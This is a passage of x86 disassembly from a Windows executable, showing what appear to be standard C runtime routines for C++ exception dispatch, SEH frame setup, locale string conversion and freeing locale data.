push offset dword_4216E4
lea eax, [ebp+var_2C]
push eax
mov [ebp+var_2C], offset off_41DC24
call sub_4041BB
loc_40BB7E: ; CODE XREF: sub_40BA07+119�j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
loc_40BB86: ; CODE XREF: sub_40BA07+50�j
; sub_40BA07+69�j ...
cmp [esi], edi
jnz loc_40BD16
cmp dword ptr [esi+10h], 3
jnz loc_40BD16
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BBB1
cmp eax, 19930521h
jz short loc_40BBB1
cmp eax, 19930522h
jnz loc_40BD16
loc_40BBB1: ; CODE XREF: sub_40BA07+196�j
; sub_40BA07+19D�j
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jbe loc_40BC7D
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
push [ebp+arg_18]
push edi
call sub_404466
add esp, 14h
mov edi, eax
loc_40BBD7: ; CODE XREF: sub_40BA07+26E�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_1C]
jnb loc_40BC7A
mov eax, [ebp+var_8]
cmp [edi], eax
jg loc_40BC6F
cmp eax, [edi+4]
jg short loc_40BC6F
mov eax, [edi+10h]
mov [ebp+var_C], eax
mov eax, [edi+0Ch]
test eax, eax
mov [ebp+var_18], eax
jle short loc_40BC6F
loc_40BC03: ; CODE XREF: sub_40BA07+23C�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea ebx, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_14], eax
jle short loc_40BC38
loc_40BC15: ; CODE XREF: sub_40BA07+22F�j
push dword ptr [esi+1Ch]
mov eax, [ebx]
push eax
push [ebp+var_C]
mov [ebp+var_20], eax
call sub_40B1FC
add esp, 0Ch
test eax, eax
jnz short loc_40BC47
dec [ebp+var_14]
add ebx, 4
cmp [ebp+var_14], eax
jg short loc_40BC15
loc_40BC38: ; CODE XREF: sub_40BA07+20C�j
dec [ebp+var_18]
add [ebp+var_C], 10h
cmp [ebp+var_18], 0
jg short loc_40BC03
jmp short loc_40BC6F
; ---------------------------------------------------------------------------
loc_40BC47: ; CODE XREF: sub_40BA07+224�j
push [ebp+arg_1C]
mov ebx, [ebp+var_C]
push [ebp+arg_18]
mov [ebp+var_1], 1
push [ebp+var_20]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
mov esi, [ebp+arg_4]
call sub_40B8A9
mov esi, [ebp+arg_0]
add esp, 1Ch
loc_40BC6F: ; CODE XREF: sub_40BA07+1E1�j
; sub_40BA07+1EA�j ...
inc [ebp+var_10]
add edi, 14h
jmp loc_40BBD7
; ---------------------------------------------------------------------------
loc_40BC7A: ; CODE XREF: sub_40BA07+1D6�j
mov edi, [ebp+arg_10]
loc_40BC7D: ; CODE XREF: sub_40BA07+1B1�j
cmp [ebp+arg_14], 0
jz short loc_40BC8D
push 1
push esi
call sub_40B3C2
pop ecx
pop ecx
loc_40BC8D: ; CODE XREF: sub_40BA07+27A�j
cmp [ebp+var_1], 0
jnz loc_40BD45
mov eax, [edi]
and eax, 1FFFFFFFh
cmp eax, 19930521h
jb loc_40BD45
mov edi, [edi+1Ch]
test edi, edi
jz loc_40BD45
push esi
call sub_40B43B
test al, al
pop ecx
jnz loc_40BD45
call sub_40539D
call sub_40539D
call sub_40539D
mov [eax+88h], esi
call sub_40539D
cmp [ebp+arg_1C], 0
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
push esi
jnz short loc_40BCF2
push [ebp+arg_4]
jmp short loc_40BCF5
; ---------------------------------------------------------------------------
loc_40BCF2: ; CODE XREF: sub_40BA07+2E4�j
push [ebp+arg_1C]
loc_40BCF5: ; CODE XREF: sub_40BA07+2E9�j
call sub_40423C
mov esi, [ebp+arg_10]
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_40B29C
add esp, 10h
push dword ptr [esi+1Ch]
call sub_40B4B4
loc_40BD16: ; CODE XREF: sub_40BA07+181�j
; sub_40BA07+18B�j ...
mov ebx, [ebp+arg_10]
loc_40BD19: ; CODE XREF: sub_40BA07+41�j
cmp dword ptr [ebx+0Ch], 0
jbe short loc_40BD45
cmp [ebp+arg_14], 0
jnz loc_40BB45
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_8]
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_40B915
add esp, 20h
loc_40BD45: ; CODE XREF: sub_40BA07+28A�j
; sub_40BA07+29C�j ...
call sub_40539D
cmp dword ptr [eax+94h], 0
jz short loc_40BD58
call sub_40BEA5
loc_40BD58: ; CODE XREF: sub_40BA07+85�j
; sub_40BA07+34A�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BA07 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_402C72
mov dword ptr [esi], offset off_41DC24
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BD75 proc near ; CODE XREF: seg000:004042AF�p
; seg000:004042EA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_40539D
cmp dword ptr [eax+20Ch], 0
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_0]
mov edi, 0E06D7363h
mov esi, 1FFFFFFFh
mov ebx, 19930522h
jnz short loc_40BDBE
mov edx, [ecx]
cmp edx, edi
jz short loc_40BDBE
cmp edx, 80000026h
jz short loc_40BDBE
mov edx, [eax]
and edx, esi
cmp edx, ebx
jb short loc_40BDBE
test byte ptr [eax+20h], 1
jnz loc_40BE51
loc_40BDBE: ; CODE XREF: sub_40BD75+27�j
; sub_40BD75+2D�j ...
test byte ptr [ecx+4], 66h
jz short loc_40BDE7
cmp dword ptr [eax+4], 0
jz loc_40BE51
cmp [ebp+arg_14], 0
jnz short loc_40BE51
push 0FFFFFFFFh
push eax
push [ebp+arg_C]
push [ebp+arg_4]
call sub_40B29C
add esp, 10h
jmp short loc_40BE51
; ---------------------------------------------------------------------------
loc_40BDE7: ; CODE XREF: sub_40BD75+4D�j
cmp dword ptr [eax+0Ch], 0
jnz short loc_40BDFF
mov edx, [eax]
and edx, esi
cmp edx, 19930521h
jb short loc_40BE51
cmp dword ptr [eax+1Ch], 0
jz short loc_40BE51
loc_40BDFF: ; CODE XREF: sub_40BD75+76�j
cmp [ecx], edi
jnz short loc_40BE35
cmp dword ptr [ecx+10h], 3
jb short loc_40BE35
cmp [ecx+14h], ebx
jbe short loc_40BE35
mov edx, [ecx+1Ch]
mov edx, [edx+8]
test edx, edx
jz short loc_40BE35
movzx esi, byte ptr [ebp+arg_1C]
push esi
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call edx
add esp, 20h
jmp short loc_40BE54
; ---------------------------------------------------------------------------
loc_40BE35: ; CODE XREF: sub_40BD75+8C�j
; sub_40BD75+92�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call sub_40BA07
add esp, 20h
loc_40BE51: ; CODE XREF: sub_40BD75+43�j
; sub_40BD75+53�j ...
xor eax, eax
inc eax
loc_40BE54: ; CODE XREF: sub_40BD75+BE�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40BD75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE59 proc near ; CODE XREF: sub_40B11E:loc_40B152�p
; sub_40B258+22�j ...
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0040BE80 SIZE 00000012 BYTES
push 8
push offset dword_421720
call __SEH_prolog4
call sub_40539D
mov eax, [eax+78h]
test eax, eax
jz short loc_40BE87
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_40BE80
sub_40BE59 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_40BE59
loc_40BE80: ; CODE XREF: sub_40BE59+1E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40BE87: ; CODE XREF: sub_40BE59+16�j
call sub_4101BD
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40BE59
; =============== S U B R O U T I N E =======================================
sub_40BE92 proc near ; CODE XREF: sub_40B4B4+23�p
call sub_40539D
mov eax, [eax+7Ch]
test eax, eax
jz short loc_40BEA0
call eax
loc_40BEA0: ; CODE XREF: sub_40BE92+A�j
jmp sub_40BE59
sub_40BE92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEA5 proc near ; CODE XREF: sub_404466+1C�p
; sub_404466:loc_4044C7�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset dword_421740
call __SEH_prolog4
push ds:dword_42640C
call sub_405193
pop ecx
test eax, eax
jz short loc_40BED7
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_40BED0
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_40BED0: ; CODE XREF: sub_40BEA5+22�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40BED7: ; CODE XREF: sub_40BEA5+1A�j
jmp sub_40BE59
sub_40BEA5 endp
; =============== S U B R O U T I N E =======================================
sub_40BEDC proc near ; CODE XREF: sub_407B19+33�p
push offset sub_40BE59
call sub_405127
pop ecx
mov ds:dword_42640C, eax
retn
sub_40BEDC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEF0 proc near ; CODE XREF: sub_40456E+4A�p
; sub_40B29C+77�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_40EC54
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_40BF2F
mov ecx, 2
loc_40BF2F: ; CODE XREF: sub_40BEF0+38�j
push ecx
call sub_40EC54
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_40BEF0 endp
; =============== S U B R O U T I N E =======================================
sub_40BF3C proc near ; CODE XREF: sub_40BF57+220�p
; sub_40BF57+229�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jz short locret_40BF56
sub eax, 8
cmp dword ptr [eax], 0DDDDh
jnz short locret_40BF56
push eax
call sub_403603
pop ecx
locret_40BF56: ; CODE XREF: sub_40BF3C+6�j
; sub_40BF3C+11�j
retn
sub_40BF3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BF57 proc near ; CODE XREF: sub_40C2F9+2C�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
cmp ds:dword_426410, ebx
push edi
mov esi, ecx
jnz short loc_40BFAE
push ebx
push ebx
xor edi, edi
inc edi
push edi
push offset dword_41DC3C
push 100h
push ebx
call ds:dword_41D12C
test eax, eax
jz short loc_40BF99
mov ds:dword_426410, edi
jmp short loc_40BFAE
; ---------------------------------------------------------------------------
loc_40BF99: ; CODE XREF: sub_40BF57+38�j
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_40BFAE
mov ds:dword_426410, 2
loc_40BFAE: ; CODE XREF: sub_40BF57+1D�j
; sub_40BF57+40�j ...
cmp [ebp+arg_C], ebx
jle short loc_40BFD5
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_40BFB9: ; CODE XREF: sub_40BF57+6A�j
dec ecx
cmp [eax], bl
jz short loc_40BFC6
inc eax
cmp ecx, ebx
jnz short loc_40BFB9
or ecx, 0FFFFFFFFh
loc_40BFC6: ; CODE XREF: sub_40BF57+65�j
mov eax, [ebp+arg_C]
sub eax, ecx
dec eax
cmp eax, [ebp+arg_C]
jge short loc_40BFD2
inc eax
loc_40BFD2: ; CODE XREF: sub_40BF57+78�j
mov [ebp+arg_C], eax
loc_40BFD5: ; CODE XREF: sub_40BF57+5A�j
mov eax, ds:dword_426410
cmp eax, 2
jz loc_40C18E
cmp eax, ebx
jz loc_40C18E
cmp eax, 1
jnz loc_40C1BF
cmp [ebp+arg_18], ebx
mov [ebp+var_8], ebx
jnz short loc_40C004
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40C004: ; CODE XREF: sub_40BF57+A3�j
mov esi, ds:dword_41D0A0
xor eax, eax
cmp [ebp+arg_1C], ebx
push ebx
push ebx
push [ebp+arg_C]
setnz al
push [ebp+arg_8]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call esi
mov edi, eax
cmp edi, ebx
jz loc_40C1BF
jle short loc_40C076
push 0FFFFFFE0h
xor edx, edx
pop eax
div edi
cmp eax, 2
jb short loc_40C076
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40C05D
call sub_4104B0
mov eax, esp
cmp eax, ebx
jz short loc_40C071
mov dword ptr [eax], 0CCCCh
jmp short loc_40C06E
; ---------------------------------------------------------------------------
loc_40C05D: ; CODE XREF: sub_40BF57+F1�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C071
mov dword ptr [eax], 0DDDDh
loc_40C06E: ; CODE XREF: sub_40BF57+104�j
add eax, 8
loc_40C071: ; CODE XREF: sub_40BF57+FC�j
; sub_40BF57+10F�j
mov [ebp+var_C], eax
jmp short loc_40C079
; ---------------------------------------------------------------------------
loc_40C076: ; CODE XREF: sub_40BF57+DA�j
; sub_40BF57+E6�j
mov [ebp+var_C], ebx
loc_40C079: ; CODE XREF: sub_40BF57+11D�j
cmp [ebp+var_C], ebx
jz loc_40C1BF
push edi
push [ebp+var_C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call esi
test eax, eax
jz loc_40C17D
mov esi, ds:dword_41D12C
push ebx
push ebx
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi
mov ecx, eax
cmp ecx, ebx
mov [ebp+var_8], ecx
jz loc_40C17D
test word ptr [ebp+arg_4], 400h
jz short loc_40C0ED
cmp [ebp+arg_14], ebx
jz loc_40C17D
cmp ecx, [ebp+arg_14]
jg loc_40C17D
push [ebp+arg_14]
push [ebp+arg_10]
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi
jmp loc_40C17D
; ---------------------------------------------------------------------------
loc_40C0ED: ; CODE XREF: sub_40BF57+16B�j
cmp ecx, ebx
jle short loc_40C136
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, 2
jb short loc_40C136
lea eax, [ecx+ecx+8]
cmp eax, 400h
ja short loc_40C11E
call sub_4104B0
mov esi, esp
cmp esi, ebx
jz short loc_40C17D
mov dword ptr [esi], 0CCCCh
add esi, 8
jmp short loc_40C138
; ---------------------------------------------------------------------------
loc_40C11E: ; CODE XREF: sub_40BF57+1AF�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C132
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40C132: ; CODE XREF: sub_40BF57+1D0�j
mov esi, eax
jmp short loc_40C138
; ---------------------------------------------------------------------------
loc_40C136: ; CODE XREF: sub_40BF57+198�j
; sub_40BF57+1A4�j
xor esi, esi
loc_40C138: ; CODE XREF: sub_40BF57+1C5�j
; sub_40BF57+1DD�j
cmp esi, ebx
jz short loc_40C17D
push [ebp+var_8]
push esi
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D12C
test eax, eax
jz short loc_40C176
cmp [ebp+arg_14], ebx
push ebx
push ebx
jnz short loc_40C15F
push ebx
push ebx
jmp short loc_40C165
; ---------------------------------------------------------------------------
loc_40C15F: ; CODE XREF: sub_40BF57+202�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_40C165: ; CODE XREF: sub_40BF57+206�j
push [ebp+var_8]
push esi
push ebx
push [ebp+arg_18]
call ds:dword_41D138
mov [ebp+var_8], eax
loc_40C176: ; CODE XREF: sub_40BF57+1FB�j
push esi
call sub_40BF3C
pop ecx
loc_40C17D: ; CODE XREF: sub_40BF57+13E�j
; sub_40BF57+15F�j ...
push [ebp+var_C]
call sub_40BF3C
mov eax, [ebp+var_8]
pop ecx
jmp loc_40C2E7
; ---------------------------------------------------------------------------
loc_40C18E: ; CODE XREF: sub_40BF57+86�j
; sub_40BF57+8E�j
cmp [ebp+arg_0], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz short loc_40C1A1
mov eax, [esi]
mov eax, [eax+14h]
mov [ebp+arg_0], eax
loc_40C1A1: ; CODE XREF: sub_40BF57+240�j
cmp [ebp+arg_18], ebx
jnz short loc_40C1AE
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40C1AE: ; CODE XREF: sub_40BF57+24D�j
push [ebp+arg_0]
call sub_4102B0
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jnz short loc_40C1C6
loc_40C1BF: ; CODE XREF: sub_40BF57+97�j
; sub_40BF57+D4�j ...
xor eax, eax
jmp loc_40C2E7
; ---------------------------------------------------------------------------
loc_40C1C6: ; CODE XREF: sub_40BF57+266�j
cmp eax, [ebp+arg_18]
jz loc_40C2AA
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_4102F7
add esp, 18h
cmp eax, ebx
mov [ebp+var_C], eax
jz short loc_40C1BF
mov esi, ds:dword_41D130
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call esi
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40C20D
loc_40C206: ; CODE XREF: sub_40BF57+2D0�j
; sub_40BF57+2F9�j
xor esi, esi
jmp loc_40C2C4
; ---------------------------------------------------------------------------
loc_40C20D: ; CODE XREF: sub_40BF57+2AD�j
jle short loc_40C24C
cmp eax, 0FFFFFFE0h
ja short loc_40C24C
add eax, 8
cmp eax, 400h
ja short loc_40C234
call sub_4104B0
mov edi, esp
cmp edi, ebx
jz short loc_40C206
mov dword ptr [edi], 0CCCCh
add edi, 8
jmp short loc_40C24E
; ---------------------------------------------------------------------------
loc_40C234: ; CODE XREF: sub_40BF57+2C5�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C248
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40C248: ; CODE XREF: sub_40BF57+2E6�j
mov edi, eax
jmp short loc_40C24E
; ---------------------------------------------------------------------------
loc_40C24C: ; CODE XREF: sub_40BF57:loc_40C20D�j
; sub_40BF57+2BB�j
xor edi, edi
loc_40C24E: ; CODE XREF: sub_40BF57+2DB�j
; sub_40BF57+2F3�j
cmp edi, ebx
jz short loc_40C206
push [ebp+var_8]
push ebx
push edi
call sub_407B70
add esp, 0Ch
push [ebp+var_8]
push edi
push [ebp+arg_C]
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40C27C
xor esi, esi
jmp short loc_40C2A1
; ---------------------------------------------------------------------------
loc_40C27C: ; CODE XREF: sub_40BF57+31F�j
push [ebp+arg_14]
lea eax, [ebp+var_8]
push [ebp+arg_10]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_14]
call sub_4102F7
mov esi, eax
mov [ebp+var_10], esi
add esp, 18h
neg esi
sbb esi, esi
and esi, [ebp+var_8]
loc_40C2A1: ; CODE XREF: sub_40BF57+323�j
push edi
call sub_40BF3C
pop ecx
jmp short loc_40C2C4
; ---------------------------------------------------------------------------
loc_40C2AA: ; CODE XREF: sub_40BF57+272�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D130
mov esi, eax
loc_40C2C4: ; CODE XREF: sub_40BF57+2B1�j
; sub_40BF57+351�j
cmp [ebp+var_C], ebx
jz short loc_40C2D2
push [ebp+var_C]
call sub_403603
pop ecx
loc_40C2D2: ; CODE XREF: sub_40BF57+370�j
mov eax, [ebp+var_10]
cmp eax, ebx
jz short loc_40C2E5
cmp [ebp+arg_10], eax
jz short loc_40C2E5
push eax
call sub_403603
pop ecx
loc_40C2E5: ; CODE XREF: sub_40BF57+380�j
; sub_40BF57+385�j
mov eax, esi
loc_40C2E7: ; CODE XREF: sub_40BF57+232�j
; sub_40BF57+26A�j
lea esp, [ebp-20h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_40BF57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C2F9 proc near ; CODE XREF: sub_404816+B6�p
; sub_404816+DB�p ...
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
push [ebp+arg_20]
lea ecx, [ebp+var_10]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40BF57
add esp, 20h
cmp [ebp+var_4], 0
jz short locret_40C33A
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40C33A: ; CODE XREF: sub_40C2F9+38�j
leave
retn
sub_40C2F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C33C proc near ; CODE XREF: sub_40C4F4+29�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, ds:dword_426414
push ebx
push esi
xor ebx, ebx
cmp eax, ebx
push edi
mov edi, ecx
jnz short loc_40C395
lea eax, [ebp+var_8]
push eax
xor esi, esi
inc esi
push esi
push offset dword_41DC3C
push esi
call ds:dword_41D124
test eax, eax
jz short loc_40C37B
mov ds:dword_426414, esi
jmp short loc_40C3AF
; ---------------------------------------------------------------------------
loc_40C37B: ; CODE XREF: sub_40C33C+35�j
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_40C390
push 2
pop eax
mov ds:dword_426414, eax
jmp short loc_40C395
; ---------------------------------------------------------------------------
loc_40C390: ; CODE XREF: sub_40C33C+48�j
mov eax, ds:dword_426414
loc_40C395: ; CODE XREF: sub_40C33C+1D�j
; sub_40C33C+52�j
cmp eax, 2
jz loc_40C46D
cmp eax, ebx
jz loc_40C46D
cmp eax, 1
jnz loc_40C497
loc_40C3AF: ; CODE XREF: sub_40C33C+3D�j
cmp [ebp+arg_10], ebx
mov [ebp+var_8], ebx
jnz short loc_40C3BF
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40C3BF: ; CODE XREF: sub_40C33C+79�j
mov esi, ds:dword_41D0A0
xor eax, eax
cmp [ebp+arg_18], ebx
push ebx
push ebx
push [ebp+arg_8]
setnz al
push [ebp+arg_4]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call esi
mov edi, eax
cmp edi, ebx
jz loc_40C497
jle short loc_40C42A
cmp edi, 7FFFFFF0h
ja short loc_40C42A
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40C414
call sub_4104B0
mov eax, esp
cmp eax, ebx
jz short loc_40C428
mov dword ptr [eax], 0CCCCh
jmp short loc_40C425
; ---------------------------------------------------------------------------
loc_40C414: ; CODE XREF: sub_40C33C+C3�j
push eax
call sub_4036E0
cmp eax, ebx
pop ecx
jz short loc_40C428
mov dword ptr [eax], 0DDDDh
loc_40C425: ; CODE XREF: sub_40C33C+D6�j
add eax, 8
loc_40C428: ; CODE XREF: sub_40C33C+CE�j
; sub_40C33C+E1�j
mov ebx, eax
loc_40C42A: ; CODE XREF: sub_40C33C+B0�j
; sub_40C33C+B8�j
test ebx, ebx
jz short loc_40C497
lea eax, [edi+edi]
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push edi
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call esi
test eax, eax
jz short loc_40C461
push [ebp+arg_C]
push eax
push ebx
push [ebp+arg_0]
call ds:dword_41D124
mov [ebp+var_8], eax
loc_40C461: ; CODE XREF: sub_40C33C+112�j
push ebx
call sub_40BF3C
mov eax, [ebp+var_8]
pop ecx
jmp short loc_40C4E2
; ---------------------------------------------------------------------------
loc_40C46D: ; CODE XREF: sub_40C33C+5C�j
; sub_40C33C+64�j
xor esi, esi
cmp [ebp+arg_14], ebx
jnz short loc_40C47C
mov eax, [edi]
mov eax, [eax+14h]
mov [ebp+arg_14], eax
loc_40C47C: ; CODE XREF: sub_40C33C+136�j
cmp [ebp+arg_10], ebx
jnz short loc_40C489
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40C489: ; CODE XREF: sub_40C33C+143�j
push [ebp+arg_14]
call sub_4102B0
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40C49B
loc_40C497: ; CODE XREF: sub_40C33C+6D�j
; sub_40C33C+AA�j ...
xor eax, eax
jmp short loc_40C4E2
; ---------------------------------------------------------------------------
loc_40C49B: ; CODE XREF: sub_40C33C+159�j
cmp eax, [ebp+arg_10]
jz short loc_40C4BE
push ebx
push ebx
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push [ebp+arg_10]
call sub_4102F7
mov esi, eax
add esp, 18h
cmp esi, ebx
jz short loc_40C497
mov [ebp+arg_4], esi
loc_40C4BE: ; CODE XREF: sub_40C33C+162�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+arg_14]
call ds:dword_41D128
cmp esi, ebx
mov edi, eax
jz short loc_40C4E0
push esi
call sub_403603
pop ecx
loc_40C4E0: ; CODE XREF: sub_40C33C+19B�j
mov eax, edi
loc_40C4E2: ; CODE XREF: sub_40C33C+12F�j
; sub_40C33C+15D�j
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_40C33C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C4F4 proc near ; CODE XREF: sub_404816+96�p
; sub_40CA44+83�p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
push [ebp+arg_1C]
lea ecx, [ebp+var_10]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40C33C
add esp, 1Ch
cmp [ebp+var_4], 0
jz short locret_40C532
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40C532: ; CODE XREF: sub_40C4F4+35�j
leave
retn
sub_40C4F4 endp
; =============== S U B R O U T I N E =======================================
sub_40C534 proc near ; CODE XREF: sub_404E21+E9�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_40C6C2
push dword ptr [esi+4]
call sub_403603
push dword ptr [esi+8]
call sub_403603
push dword ptr [esi+0Ch]
call sub_403603
push dword ptr [esi+10h]
call sub_403603
push dword ptr [esi+14h]
call sub_403603
push dword ptr [esi+18h]
call sub_403603
push dword ptr [esi]
call sub_403603
push dword ptr [esi+20h]
call sub_403603
push dword ptr [esi+24h]
call sub_403603
push dword ptr [esi+28h]
call sub_403603
push dword ptr [esi+2Ch]
call sub_403603
